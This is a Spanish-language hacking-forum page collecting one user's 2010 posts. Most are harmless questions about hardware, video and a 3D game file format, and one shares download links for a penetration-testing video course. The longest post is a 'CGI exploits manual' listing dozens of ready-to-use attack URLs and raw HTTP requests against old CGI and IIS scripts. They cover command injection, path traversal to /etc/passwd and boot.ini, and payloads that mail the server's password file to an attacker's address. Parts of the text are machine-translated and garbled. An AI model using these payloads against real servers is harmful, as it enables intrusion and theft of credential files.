elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Temas
Páginas: 1 2 [3]
21  Informática / Hardware / hola ayuda disco duro dañados sectores en: 10 Junio 2010, 23:45 pm
hola que programa sirve para separar los sectores defectuosos de un disco duro

yo se que el hdd generator los arregla pero no me sirve

y mi disco es dide y pc docto no lo encuentra
22  Programación / Desarrollo Web / sitio para vender paginas web en: 18 Mayo 2010, 16:23 pm
alguien conoce algun sitio para  conocer sitios para vender apginas web, he escuchado uno que es qal estilo de mercado libre pero especializado para programadores web
23  Programación / Programación General / sito para subir programas en: 18 Mayo 2010, 16:20 pm
alguien conoce un sitio apra subir programas elaborados por uno y un usuario por bajarlos uno gane dinero puedes ser soft para pc o para celular
24  Media / Diseño Gráfico / preunta juegos 3d 3dsexville en: 7 Mayo 2010, 07:55 am
lo que pasa es que juegos de hoy de 3d como grand thief auto san andres o el que me interesa sexvilla uno puede crear modulos del juego adicionar graficos 3d los archivos llevan una extension .bsb cifrada y uno con un soft lo pasa a bs y puede ver el codigo

ejemplo 

//BS ???
// cloth_maidhat01.bs
// converted from: cloth_maidhat01.[bsb] (BSB v5, encrypted)
// created by: BSB Tool (v2.0.1)
TTransform :local_1. {
    TNode.SNode STransform :local_2;
    Object.Name "Shared/Cloth/cloth_maidhat01.ma";
};
TTransform :local_3. {
    TNode.SNode STransform :local_4;
    TNode.Parent TTransform :local_1;
    Object.Name "hair_group";
};
TTransform :local_5. {
    TNode.SNode STransform :local_6;
    TNode.Parent TTransform :local_3;
    Object.Name "maidhat_mesh";
};
TPolygonGeometry :local_7. {
    TGeometry.Shader RenderShader :local_8;
    TNode.SNode SPolygonGeometry :local_9;
    TNode.Parent TTransform :local_5;
    TNode.BoundingSphere Spheref(-50.204071e-03, 0.137206, 1.902531e-02, 100.030733e-02);
    Object.Name "maidhat_meshShape";
};
RenderShader :local_8. {
    RenderShader.Surface ShaderPhong :local_10;
    RenderShader.CullEnable False;
    Object.Name "phong6SG";
};
ShaderPhong :local_10. {
    ShaderPhong.Color ShaderTexture :local_11;
    ShaderPhong.Material RenderMaterial :local_12;
};
ShaderTexture :local_11. {
    ShaderTexture.Texture Texture2D :local_13;
    Object.Name "file10Shader";
};
Texture2D :local_13. {
    Texture.FileObject FileObject :local_14;
    Object.Name "file10";
};
FileObject :local_14 FileObject.FileName "Shared/Cloth/cloth_maid01";
RenderMaterial :local_12 RenderMaterial.SpecularColor Vector3f(0.05, 0.05, 0.05);

yo se algo de programacion pero no en 3d alguien conoce un software que me allude a diseñar y cambiar esat clase de archivos

por lo que he mirado es como hacer graficos en autocad

mira este ejemplo solo he podido encontrar un soft para abrirlas que se llama OBJECTOR este ejemplo es unas gafas



PERO ALGUIEN CONOCE UN SOFT PARA EDITARLAS


 
25  Media / Diseño Gráfico / ¿como mejorar la calidad de los videos 3gp? en: 8 Abril 2010, 23:15 pm
que soft o que procedimentos para mejorar la calidad de los videos de movil 3gp
26  Comunicaciones / Redes / revista online servidores en: 12 Febrero 2010, 01:03 am
Nesesito una pagina web gratuita que uno vea los ultimos servidores de ibm, hp solaris y demas perisfericos que estan saliendo al mercado con su respectivo analisis es apra estar actualizado ante to lo novedoso en cuento a redes.

Puede ser en español, si no en ingles.
27  Seguridad Informática / Hacking / VTC Ethical Hacking & Penetration Testing Tutorials en: 9 Febrero 2010, 05:29 am



Brad Causey & Bobby Rogers | English


Computer Hacking is no longer the black art of computer geniuses. Exploit scripts and hacks are available to anyone with a web browser, so prepare yourself to protect your network by looking at security from a hacker’s eyes. Understanding what attack vectors might be used on your systems is a fundamental piece of the security toolkit. VTC Authors Brad Causey and Bobby Rogers present computer security from an angle that aims to put you into the seat, to protect your network through Ethical Hacking and Penetration Testing. To begin learning today, simply click the links.[/center]


Introduction
Course Overview (04:54)
Ethical Hacking & Penetration Testing
What is Ethical Hacking? (04:58)
Types of Ethical Hacking (05:31)
Responsibilities of the Ethical Hacker (03:12)
Customer Expectations (04:04)
Skills of the Hacker (04:16)
Relevant Laws (04:54)
Preparation (04:46)
Types of Attacks (02:12)
Methodology Overview
Your Goals (02:34)
Reconnaissance [passive, active] (05:11)
Scanning (03:42)
Service Enumeration (03:05)
Vulnerability Assessment (03:35)
Vulnerability Exploitation (02:52)
Penetration & Access (03:24)
Privilege Escalation & Owning the Box (02:40)
Evading Defenses & Erasing Tracks (04:01)
Maintaining & Expanding Access (03:22)
Reconnaissance (Footprinting)
Passive Reconnaissance (05:03)
Using WHOIS & Other Tools (03:03)
Active Reconnaissance (04:10)
Active Reconnaissance Tools & Methods (04:55)
Putting It All Together (03:09)
Reconnaissance Demo (07:04)
Scanning
Scanning For Hosts (02:20)
TCP Connection Basics (04:14)
TCP Scan Types (07:18)
UDP & ICMP Scanning (03:44)
Scanning Demonstration using NMAP (05:19)
Port & Service Enumeration
Identifying Ports & Services (03:06)
OS Fingerprinting (02:57)
Popular Scanners (01:54)
Demonstration (05:15)
Data Enumeration
Data Enumeration (05:12)
SNMP Enumeration (07:14)
DNS Zone Transfers (06:36)
Windows Null Sessions (05:03)
NetBIOS Enumeration (06:44)
Active Directory Extraction (03:02)
Vulnerability Assessment
Vulnerabilities & Exploits (06:07)
OS Vulnerabilities (05:59)
Web Server Vulnerabilities (06:54)
Database Vulnerabilities (05:25)
TCP Stack Vulnerabilities (04:13)
Application Vulnerabilities (03:05)
Vulnerability Assesment (07:21)
Penetration/Access/Compromise Pt.1
Penetrating the System Pt.1 (05:28)
Penetrating the System Pt.2 (03:11)
Bypassing Access Controls (06:34)
Password Cracking Pt.1 (04:58)
Password Cracking Pt.2 (03:52)
Social Engineering (06:28)
Penetration/Access/Compromise Pt.2
Session Hijacking Pt.1 (05:46)
Session Hijacking Pt.2 (04:01)
Privilege Escalation (04:45)
Maintaining & Expanding Access (07:01)
System Compromise (04:40)
Evading Defenses & Erasing Tracks
Where Your Actions Recorded Pt.1 (02:04)
Where Your Actions Recorded Pt.2 (06:50)
Deleting Log Files & Other Evidence Pt.1 (03:16)
Deleting Log Files & Other Evidence Pt.2 (04:26)
Rootkits (05:21)
Steganography (06:58)
Evading IDS & Firewalls (04:29)
Introduction to Hacking Techniques Pt.1
Encryption (06:07)
Sniffers (04:15)
Wireless hacking (06:29)
SQL Injection (04:18)
Introduction to Hacking Techniques Pt.2
Buffer Overflows (05:19)
Rootkits (03:52)
Spoofing (04:33)
Denial of Service Attacks (03:59)
Web Hacking (07:00)
Popular Tools
nmap Pt.1 (06:38)
nmap Pt.2 (02:14)
SuperScan (04:30)
Nessus (06:27)
Penetration Test Demo
Penetration Test Demo Pt.1 (01:41)
Penetration Test Demo Pt.2 (00:59)
Penetration Test Demo Pt.3 (01:05)
Credits
About the Authors (01:37)




Download Links


Hotfile

http://hotfile.com/dl/27117920/4a6d187/VTC.Ethical.Hacking_Penetration.part1.rar.html

http://hotfile.com/dl/27117831/2309f8e/VTC.Ethical.Hacking_Penetration.part2.rar.html


Uploading

http://uploading.com/files/9f617fb7/VTC.Ethical.Hacking_Penetration.part1.rar/

http://uploading.com/files/a8ba3e2f/VTC.Ethical.Hacking_Penetration.part2.rar/
28  Informática / Electrónica / electrovalvula casera en: 2 Febrero 2010, 02:59 am
existe alguan forma de hacer una electroavlvula casera
29  Foros Generales / Sugerencias y dudas sobre el Foro / podrian por favor cambiar mi nick en: 29 Enero 2010, 19:40 pm
por favor me lo podrian cambiar por nick billgay
30  Seguridad Informática / Nivel Web / Manual de Exploits CGI en: 28 Enero 2010, 08:18 am
Este tutorial te mostrará muchos Cgi-Bin

un intro que son los exploits

http://neworder.box.sk/newsread.php?newsid=1351

-<>-

PHF:

Una secuencia de comandos que venían de serie con el popular servidor web Apache también contiene un grave defecto. Hay parámetro incorrectos , por lo tanto,  cualquier comando que desea puede ser ejecutado en el sistema.

Exploit:

http://www.thesite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

muestra los password del servidor.


-<>-

Test-Cgi

Cualquier persona puede remotamente los archivos en una máquina.

Exploit:

http://www.thesite.com/cgi-bin/test-cgi?*

muestra el contenido del servidor  Cgi directory.

/cgi-bin/test-cgi?/*

mostrará el contenido del directorio de servidores raíz.

CONTENT_TYPE, CONTENT_LENGTH, HTTP_ACCEPT, HTTP_REFERER, PATH_INFO, PATH_TRANSLATED, REQUEST_METHOD, SERVER_PROTOCOL, REMOTE_HOST field.

Tambien se puede utilizar con telnet en puerto 80

GET /cgi-bin/test-cgi?x> /*

-<>-

Fax Survey

Si se instala el paquete de HylaFAX (común en algunas personas mayores distribuciones de Linux), puede enviar comandos arbitrarios ejecutando como el UID del servidor web:

Exploit:

http://www.thesite.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

muestra los password del servidor

-<>-

Netauth

Netauth es una red basada Sistema de gestión de correo electrónico para Windows NT y la mayoría de plataformas UNIX. Este producto contiene un agujero de seguridad que permite a los usuarios remotos descargar archivos locales, incluidos los archivos como / etc / shadow.

Exploit:

http://www.thesite.com/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd

muestra los password del servidor.

-<>-
Calender.pl

La vulnerabilidad permite a usuarios remotos ejecutar comandos arbitrarios en el servidor web con los privilegios del proceso httpd process.

El script calender_admin.pl solicita al usuario un archivo de configuración para modificarlo y  a continuación en un intento de autenticar al usuario, lo pasa a la entrada del usuario directamente a perl open (). Esto puede ser fácilmente explotada para ejecutar código arbitrario de forma remota.
Exploit:

http://www.thesite.com/cgi-bin/calender_admin.pl

Ir a la URL que se traducirá en un nombre de username/password/configuration  de los campos de entrada ignore el nombre de usuario y contraseña, introduzca:


ejemplo:
|ping 127.0.0.1|

y el comando se ejecutara.

-<>-

HTML script

HTML script  tiene una vulnerabilidad en el mismo que le permite acceder a archivos del sistema, presumiblemente cualquier fichero que el usuario del servidor web puede acceder.

Exploit:

http://www.thesite.com/cgi-bin/htmlscript?../../../../etc/passwd

La URL anterior se recibe el archivo de contraseñas del servidor.

-<>-
Finger

- <> --
Finger

Obtenga una lista de direcciones de correo electrónico que encuentra en el lugar (vamos a suponer uno de ellos es "kangaroo@acme.net", y que su dirección de correo electrónico es "your@email.org")

Ir a la Finger Box, y en este tipo (cambia las direcciones de correo electrónico por unas reales):

kangaroo@acme.net; /bin/mail your@email.org < etc/password

Si esto funciona usted tiene el archivo etc / contraseña en su buzón de correo.

-<>-

classifieds.cgi

Anuncios es una script  Cgi libre para el manejo de los anuncios clasificados. Existen múltiples agujeros de seguridad en el que permitir la ejecución remota. En primer lugar, mediante el establecimiento de su dirección de correo electrónico como algo así como "duke@viper.net.au </ etc / contraseña, puede leer archivos de forma remota del servidor.

Además, mediante el establecimiento de las variables ocultas en un formulario html, un usuario remoto puede obligar a comandos arbitrarios a ser ejecutados. Un ejemplo de ello es la modificación de las siguientes variables:

><input type="hidden" name="mailprog" value="/usr/sbin/sendmail">

Cambiar su valor a otro comando hará que el comando alternativo para ser ejecutado.

-<>-
WebGais

WebGais es una interfaz a la herramienta de búsqueda GAIS. Se instala algunos programas en / cgi-bin. La utilidad principal se llama "WebGais" y que la interconexión real con la herramienta de búsqueda.

Se lee la consulta de un formulario de usuario, y luego ejecuta el motor de búsqueda GAIS para esa consulta. El autor trató de proteger el programa utilizando comillas simples alrededor de la consulta cuando se la pasó a un sistema de "comando". Pero se olvidó de un algo muy importante: para quitar las comillas simples de la consulta .

Exploit:

Telnet Target.machine.com  80
/Cgi-bin/webgais POST HTTP/1.0 Content-Length: 85 (sustituir esto con la longitud real de la "explotar" en línea)

query = '; + correo drazvan@pop3.kappa.ro </ etc / passwd; echo' & = salida de Estudiantes de dominio = párrafo

-<>-
Web Sendmail

Websendmail es un cgi-bin que viene con el paquete WebGais, que es una interfaz a la herramienta de búsqueda GAIS. Se trata de un script PERL que lee la entrada de un formulario y lo envía por e-mail al destino especificado.

Exploit:

Telnet Target.machine.com  80
POST / HTTP/1.0 cgi-bin/websendmail
Content-Length: xxx (debería ser reemplazado con la longitud real de la
Cadena que se pasa al servidor, en este caso xxx = 90)
= receptor; + correo your_address@somewhere.org </ etc / passwd; & sender = a & rtnaddr = a & subject = a & contenido = a

-<>-
Aglimpse

Glimpse HTTP es una interfaz a la herramienta de búsqueda Glimpse, escrito en Perl. Un agujero puede permitir la ejecución de cualquier comando en el sistema remoto.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/aglimpse/80IFS=5; CMD = 5mail5thegnome@nmrc.org <mailto:thegnome@nmrc.org> passwd; eval $ CMD

- <> --
Webcom's Guestbook CGI vulnerability

Webcom's Guestbook CGI vulnerability  para los servidores de Windows NT Web sufre de graves problemas de seguridad que permiten a los usuarios a distancia para ver los archivos de sistema local.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/rguest.exe?template=full-path-to-filename (para recibir archivos importantes del sistema)

- <> --
Webdist.cgi

Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP. (Root or nobody).

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/webdist.cgi

- <> --
Wrap

Este exploit le permite a cualquiera obtener una lista para cualquier directorio con el mode +755


Exploit Ejemplo:

http://www.thesite.com/cgi-bin/wrap

- <> --
PHP.cgi

Un fallo de seguridad que permite a un atacante leer archivos arbitrarios con los privilegios del demonio HTTP (Usually root or nobody)..

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/php.cgi

- <> --
Perl.exe

Este exploit nos permite ejecutar código Perl arbitrario en un PC, a distancia, por supuesto.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/perl.exe

- <> --
NPH-test-cgi

Un fallo de seguridad que permite que obtiene la lista de los / directorio cgi-bin, descubriendo así que cgis están instalados en la máquina remota.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/NPH-test-cgi

- <> --
NPH-publish.cgi

Un fallo de seguridad que permite a un atacante ejecutar cualquier
los comandos con los privilegios del demonio HTTP.

Exploit Ejemplo:

http://www.thesite.com/cgi-bin/nph-publish.cgi

- <> --
newdsn.exe

Este exploit le permite a cualquier atacante como nosotros la capacidad de crear archivos en cualquier lugar en su sistema si los permisos NTFS no son lo suficientemente estrictos, y se puede utilizar para sobrescribir los DSN de las bases de datos existentes

Ejemplo Exploit: http://www.thesite.com/cgi-bin/scripts/tools/newdsn.exe

- <> --
JJ

Un fallo de seguridad que permite a un atacante ejecutar cualquier
de los comandos con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/jj


- <> --
info2www

Un fallo de seguridad que nos permite ejecutar comandos arbitrarios con los privilegios del demonio HTTP. (Por lo general la raíz o nadie).

Ejemplo Exploit: http://www.thesite.com/cgi-bin/info2www

- <> --
Add-password.cgi


Ejemplo Exploit: http://www.thesite.com/cgi-bin/add-password.cgi

- <> --
imagemap.exe

Esta aplicación CGI es vulnerable a un desbordamiento de búfer que permitiría a un usuario remoto. poder ejecutar comandos arbitrarios con los privilegios de los administradores del servidor httpd. (O bien nadie o raíz)

Ejemplo Exploit: http://www.thesite.com/cgi-bin/imagemap.exe

- <> --
dumpenv.pl

Esta vulnerabilidad se da un montón de información sobre la configuración del servidor web

Ejemplo Exploit: http://www.thesite.com/cgi-bin/dumpenv

- <> --
guestbook.pl

Una brecha que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/guestbook.pl

- <> --
LibroDeInvitados.cgi

Una brecha que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/guestbook.cgi

- <> --
Campas

Un  exploit que nos permita ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/campas

- <> --
scripts

Si el directorio / scripts es navegable (probablemente si no se sabe nada de seguridad), entonces esto nos daría información valiosa sobre scripts que tienen instalado por defecto y también si hay alguna scripts actual, que pueden ser vulnerables

Ejemplo Exploit: http://www.thesite.com/cgi-bin/scripts

- <> --
loadpage.cgi

Este exploit viene con el paquete del 3,0 EZShopper. Podemos abrir los subdirectorios y / o ver algunos contenidos de archivos sensibles, como los archivos de datos de usuario.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=/

- <> --
search.cgi

Un error que nos permite ejecutar comandos en el servidor y ver archivos fuera de la ruta de acceso web.

http://www.thesite.com/cgi-bin/search.cgi?user_id=1&database=../../../etc/passwd&template=foo&distinct=1

- <> --
CGI Counter

La popular página web de la versión CGI acceso al  CGI counter version 4.0.7 por George Burgyan permite la ejecución de comandos arbitrarios, debido a la entrada del usuarios. Los comandos se ejecutan con los mismos privilegios que el servidor web, pero otras vulnerabilidades se pueden utilizar para tener acceso de root en un sistema operativo actualizados.

Exploit:

Using straight URL
http://www.example.com/cgi-bin/counterfiglet/nc/f =; eco; w; uname% 20-A; ID
(Esto mostrará el nombre de usuario de un sistema dado)

Al pasar los comandos en una variable:
$ Telnet www.example.com www
GET / cgi-bin/counterfiglet/nc/f =;% sh 20-C% 20 "$ HTTP_X" HTTP/1.0
X: pwd; ls-la / etc; cat / etc / password

$ Telnet www.example.com www
GET / cgi-bin/counter/nl/ord/lang = Inglés (1); sistema ( "$ ENV (HTTP_X)"); HTTP/1.0
X: eco; id; uname-a; w

- <> --
SGI Infosearch

El subsistema de búsqueda de información se utiliza para buscar y navegar casi todos los SIG en la documentación en línea. Una vulnerabilidad ha sido descubierta en Infosearch.Cgi que podría permitir a cualquier usuario remoto para ver los archivos en el sistema vulnerable con los privilegios del usuario "nobody".

- <> --
Poll It

Poll It permite un fácil alojamiento de encuestas en línea en sitios web. Sin embargo, esta CGI también permite a atacantes remotos para leer cualquier archivo legible del mundo en el servidor.

Exploit:

http://www.thesite.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd 00%

La URL anterior sería recuperar el archivo de contraseñas del servidor.

- <> --
Robpoll

Robpoll es un programa basado en Cgi libre de administración.

Exploit:

Primero ir a:

http://www.thesite.com/cgi-bin/robpoll.cgi?Admin

Usted tendrá la opción de cambiar la contraseña. La contraseña por defecto es "Robpoll", dejando esta contraseña tanto, compromete el sistema y sus archivos.

- <> --
Webbanner

Un agujero de seguridad en el CGI webbanner permite a atacantes remotos para ver determinados archivos en el sistema, y posiblemente ejecutar comandos del sistema, así.

Exploit:

http://www.thesite.com/random_banner/index.cgi?image_list=alternative_image.list&html_file=../../../../../etc/passwd

La URL indicada anteriormente recuperar el archivo de contraseñas del servidor.

- <> --
WebWho +

WebWho + es un scblockedript Cgi libre para la ejecución de consultas whois a través de la www. A pesar de que lleva a cabo los controles de los caracteres de escape de Shell en algunos parámetros, se pierde la variable «type» y permite la entrada maliciosos para ser enviados a shell. Es posible ejecutar código arbitrario en un servidor web corriendo WebWho + v1.1 con el ID de usuario del servidor web.

- <> --
FormMail.pl

Una falla grave en el programa CGI popular Formmail.pl permite spammers para enviar mensajes anónimos

Exploit Ejemplo:
http://www.thesite.com/cgi-bin/formmail.pl

- <> --
alibaba.pl

Este exploit permitirá tener un listado de directorio de todos los archivos en el directorio CGI. Esto podría ser utilizado para encontrar los archivos. Pwl y para encontrar más directorios y scripts a explotar.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/alibaba.pl|dir

- <> --
input.bat

Este exploit  le permiten ejecutar comandos arbitrarios

Ejemplo Exploit: http://www.thesite.com/cgi-bin/input.bat?|dir....windows


- <> --
bigconf.cgi

Un fallo de seguridad que nos permite ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/bigconf.cgi

- <> --

- <> --
tst.bat

Esta falla en tst.bat nos permitiría leer archivos arbitrarios en un sistema remoto

Ejemplo Exploit: http://www.thesite.com/cgi-bin/tst.bat

- <> --
Idq.dll

Este exploit nos permitiría leer archivos arbitrarios en un sistema remoto

Ejemplo Exploit: http://www.thesite.com/query.idq?CiTemplate=../../../somefile.ext

- <> --
FormHandler.cgi

La utilidad FormHandler CGI puede permitirnos descargar cualquier archivo de los sistemas vulnerables.

Ejemplo Exploit: http://www.thesite.com/formhandler.cgi

- <> --
Showcode.asp


Una muestra de Active Server Page (ASP) script instalado por defecto en Microsoft Internet Information Server (IIS) 4.0 nos daría acceso para ver cualquier archivo en el mismo volumen que el servidor web que sea legible por el servidor web.

Ejemplo Exploit: http://www.thesite.com/msadc/Samples/SELECTOR/showcode.asp

- <> --
CodeBrws.asp

Este exploit nos permitiría ver la fuente de cualquier archivo en la raíz web con las extensiones. Asp. Inc. Htm o. Html

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/howitworks/codebrws.asp

- <> --
htimage.exe

Existe un desbordamiento de búfer en el htimage.exe remoto cuando se da la siguiente petición:

Ejemplo Exploit: http://www.thesite.com/cgi-bin/htimage.exe/AAAA [....] AAA? 0,0

- <> --
wguest.exe

La solicitud de http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini devolverá el boot.ini web remota los servidores de archivos

Ejemplo Exploit: http://www.thesite.com/cgi-bin/wguest.exe?template=c:boot.ini

- <> --
uploader.exe


Un fallo de seguridad que le permite cargar cualquier Cgi arbitrario en el servidor, y luego ejecutarlos.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/uploader.exe

- <> --
search97.vts

Este exploit  se puede utilizar para ver de forma remota cualquier archivo en un servidor web.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/search97.vts

- <> --
rguest.exe

Este exploit  volverá con los $ winnt $. Inf.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/rguest.exe?template=c:winntsystem32 $ winnt $. Inf

- <> --
pfdispaly.cgi

Este exploit  nos permita ver los archivos en un sistema vulnerable con los privilegios del usuario
Si se explota, puede permitir a cualquier usuario ver los archivos en un sistema vulnerable con los privilegios del usuario.

Ejemplo Exploit: http / / www.thesite.com / cgi-bin / pfdisplay.cgi

- <> --
Man.sh

Esto permitiría aprovechar todo el que puede ejecutar Cgi navegador web a través de ti ejecutar comandos del sistema con el ID de usuario del servidor web y obtener la salida de ellos en una página web.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/man.sh

- <> --
/ scripts / issadmin / bdir.htr

El bdir.htr archivo es un archivo por defecto de IIS que nos puede dar una gran cantidad de información innecesaria sobre
un sistema de archivos.

http://www.thesite.com/scblockedripts/iisadmin/bdir.htr??c:

- <> --
Count.cgi

Un desbordamiento de búfer puede ser en el programa de Count.cgi, permitiendo a los usuarios http remotos ejecutar comandos arbitrarios en la máquina objetivo.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/Count.cgi

- <> --
CGImail.exe

Una brecha de seguridad que podemos usar para obtener acceso a los confidenciales
de datos o fomentan la escalada de nuestros privilegios.

Ejemplo Exploit: http://www.thesite.com/scblockedripts/CGImail.exe

- <> --
carbo.dll

Este exploit  se puede utilizar para ver de forma remota cualquier archivo en su servidor web.

Ejemplo Exploit: http://www.thesite.com/carbo.dll?icatcommand=file_to_view&catalogname=catalog

- <> --
args.bat

Un fallo de seguridad que permite a un atacante subir archivos arbitrarios en el servidor web remoto.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/args.bat

- <> --
AnyForm2

Este exploit puede ser utilizado por nosotros al correo electrónico la contraseña del servidor web el archivo de nuevo a nosotros.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/AnyForm2

- <> --
get32.exe

Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP.
Ejemplo Exploit: http://www.thesite.com/cgi-bin/get32.exe

- <> --
Ews

Un fallo de seguridad que permite a cualquiera ejecutar comandos arbitrarios con los privilegios del demonio HTTP.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/ews

- <> --
exprcalc.cfm

Este exploit nos permitiría ver, eliminar y cualquier subida en un servidor ColdFusion Application Server

Ejemplo Exploit: http://www.thesite.com/cfdocs/expeval/exprcalc.cfm

- <> --
ExAir

IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / advsearch.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/advsearch.asp

- <> --
ExAir

IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / Query.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/query.asp

- <> --
ExAir

IIS viene con el sitio de la muestra ExAir. La página / iissamples / EXAIR / search / search.asp
podría ser utilizado para hacer IIS se bloquea, lo que le impide responder a solicitudes de los clientes legítimos.

Ejemplo Exploit: http://www.thesite.com/iissamples/exair/search/search.asp

- <> --
Altavista

Sería posible leer el contenido de los archivos en la máquina remota mediante el uso de la Altavista búsqueda en la intranet de servicios, y realizar la solicitud a continuación.

Ejemplo Exploit: GET http://www.thesite.com/cgi-bin/query?mss =% 2e/config 2e%

- <> --
input2.bat

Es posible mal uso de este archivo. Bat para hacer que el servidor remoto ejecutar comandos arbitrarios.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/input2.bat?|dir....windows

- <> --
envout.bat

Es posible mal uso de este archivo. Bat para hacer que el servidor remoto ejecutar comandos arbitrarios.

Ejemplo Exploit: http://www.thesite.com/ssi/envout.bat

- <> --
/cd/.. /config/html/cnf_gi.htm

Es posible acceder a la configuración remota AxisStorpoint anfitrión con Este exploit

Ejemplo Exploit: http://www.thesite.com/cd/../config/html/cnf_gi.htm

- <> --
cachemgr.cgi

RedHat Linux 6.0 instala squid cache manager  por defecto con permisos de acceso no restringido. Esta script podría ser utilizado para realizar un escaneo de puertos desde el Cgi-host machine.

Ejemplo Exploit: http://www.thesite.com/cgi-bin/cachemgr.cgi

- <> --
Web raíz remoto

Es posible obtener la ubicación de un directorio de red virtual de un host mediante la emisión de la orden de abajo.

Ejemplo Exploit: GET http://www.thesite.com/cgi-bin/ls HTTP/1.0

- <> --
CGI

Esta es una muy obvio sin explotar. Es el cgi-bin navegable? Suena estúpido, pero es que algunas personas son estúpidas. Recuerde que.

Ejemplo Exploit: http://www.thesite.com/Cgi-Bin

- <> --
cgitest.exe

Existe un desbordamiento de búfer en el cgitest.exe, que nos permitirá ejecutar comandos arbitrarios con los mismos privilegios que el servidor web (raíz o de nadie).

Ejemplo Exploit: http://www.thesite.com/cgi-bin/cgitest.exe

- <> --
ExprCalc.cfm

Para visualizar y borrar cualquier archivo en el sistema de uso de una dirección URL de la siguiente forma siguiente:

Ejemplo Exploit: http://www.thesite.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=C:thetargetfile

- <> --
getdrvrs.exe

Obtener los controladores desde el sitio.

Ejemplo Exploit: http://www.thesite.com/scblockedripts/tools/getdrvrs.exe

- <> --
bnbform.cgi

Los usuarios remotos pueden leer ficheros arbitrarios en el sistema de archivos.

Ejemplo Exploit: http://www.thesite.com/Cgi-Bin/bnbform.cgi

- <> --
survey.cgi

Los usuarios remotos pueden ejecutar comandos con privilegios del servidor web

Ejemplo Exploit: http://www.thesite.com/Cgi-bin/survey.cgi

- <> --
.htaccess

Cgi-host machine le permitiría leer archivos protegidos con. Htaccess

http://www.thegnome.com/secure/.htaccess

- <> --
convert.bas

Cgi-host machine le permitirá leer cualquier archivo en el sistema de archivos remoto.

Exploit Ejemplo:
http://thesite.com/scblockedripts/convert.bas?../anythingyouwanttoview


CREDITOS

BLACKACE227

NOTA: ME PODRIAN DECIR CUALES SON LOS QUE FALTAN Y QUE OTRAS PAGIANS ESPECIFICAN INFORMACION SOBRE MAS DETALLADA SOBRE ESTO ES PARA  IR ACTUALIZANDOLO Y HACER UN MANUAL SUPERCOMPLETO SOBRE EL TEMA
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines